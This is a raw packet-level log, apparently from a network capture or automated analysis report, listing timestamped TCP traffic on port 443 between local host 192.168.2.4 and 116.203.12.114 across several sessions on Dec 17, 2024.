                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.246467113 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.246510029 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.246531010 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.246540070 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.247514009 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.247617960 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.247751951 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.247776031 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.247797012 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.247824907 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249327898 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249470949 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249496937 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249512911 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249530077 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249660969 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249703884 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.249725103 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282562017 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282749891 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282778025 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282793045 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282905102 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282929897 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282933950 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.282968044 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283121109 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283153057 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283169985 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283255100 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283382893 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283411980 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283417940 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283423901 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283555031 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283555984 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283590078 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283704996 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283739090 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283755064 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283871889 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283871889 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.283945084 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.284077883 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.284101963 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.284110069 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.284126997 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.284231901 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.284271002 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325567961 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325731993 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325761080 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325787067 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325792074 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325805902 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325918913 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325965881 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.325994968 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.326013088 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.326069117 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.326081991 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.326121092 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361582041 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361607075 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361695051 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361718893 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361736059 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361759901 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361769915 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361778021 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361799955 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361871958 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.361898899 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374063969 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374078989 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374221087 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374237061 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374340057 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374377012 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.374490023 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.405831099 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.405846119 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.405981064 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406007051 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406013966 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406060934 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406177044 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406205893 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406212091 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406224966 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406332970 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406356096 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406359911 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406359911 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406373978 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406378031 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406387091 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406387091 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406407118 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406475067 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406491995 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406512976 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406522989 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406582117 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.406593084 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445569992 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445674896 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445797920 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445822954 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445832014 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445851088 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445914984 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445914984 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.445945978 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446026087 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446038961 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446058989 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446136951 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446223974 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446240902 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446254015 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.446259022 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.491333008 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514257908 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514416933 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514451981 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514471054 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514484882 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514595985 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514624119 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514652967 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514667988 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514877081 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514908075 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514914989 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.514926910 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515021086 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515047073 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515047073 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515052080 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515168905 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515196085 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515229940 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515238047 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515245914 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515273094 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515278101 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515280962 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515294075 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515297890 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515328884 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515345097 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515361071 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515376091 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515391111 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515393019 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515412092 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515414953 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515443087 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515443087 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515450954 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515467882 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515474081 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515486956 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515496969 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515552998 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.525806904 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.525820971 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.525919914 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526005983 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526019096 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526046038 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526065111 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526169062 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526197910 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.571336031 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.639575958 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.642800093 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.642834902 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.642842054 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646260023 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646459103 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646478891 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646491051 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646532059 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646661043 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646692991 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646878004 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646893024 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646918058 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.653851032 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.653886080 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654067039 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654090881 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654105902 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654126883 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654268026 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654289961 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.656858921 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.656866074 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659511089 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659620047 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659632921 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659759045 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659774065 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659835100 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659845114 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659878016 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659923077 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659949064 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.707338095 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.890969992 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.902941942 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:48.438684940 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:48.438929081 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:48.439335108 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:48.439348936 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:48.441009998 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:48.441015959 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.319781065 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.319818974 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.319890976 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.319901943 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.319914103 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.319953918 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.320187092 CET49897443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.320211887 CET44349897116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.323040962 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.323076963 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.323136091 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.323337078 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:49.323348045 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:50.734903097 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:50.734982967 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:50.735421896 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:50.735431910 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:50.737133026 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:50.737139940 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651016951 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651195049 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651232958 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651256084 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651268959 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651269913 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651310921 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651470900 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651487112 CET44349904116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651500940 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:51.651536942 CET49904443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.172666073 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.172748089 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.172796965 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.173769951 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.173769951 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.476778030 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:54.476800919 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:01.916759968 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:01.916815042 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:01.916901112 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:01.917118073 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:01.917133093 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.019789934 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.019840002 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.019893885 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.020371914 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.020387888 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.322895050 CET44349933116.203.12.114192.168.2.4
